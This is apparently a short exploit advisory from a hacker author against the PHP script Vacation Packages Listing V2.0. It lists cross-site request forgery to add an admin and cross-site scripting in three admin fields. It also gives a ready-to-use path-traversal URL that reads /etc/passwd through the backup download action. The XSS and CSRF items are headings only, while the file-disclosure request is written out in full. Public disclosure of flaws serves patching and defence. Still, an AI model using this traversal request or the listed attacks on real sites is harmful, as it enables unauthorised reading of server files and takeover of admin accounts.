Vacation Packages Listing V2.0 - Multiple Vulnerabilities ==================================================================== #################################################################### .:. Author : HackXBack .:. Contact : h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/vacation-packages/ #################################################################### ===[ Exploit ]=== [1] Cross Site Request Forgery ============================== [Add Admin]
[2] Multiple Cross Site Scripting ================================== # CSRF with XSS Exploit: I. Xss In Types
II. Xss In Features
III. Xss In Countries
[3] Local File disclure ======================== http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd ####################################################################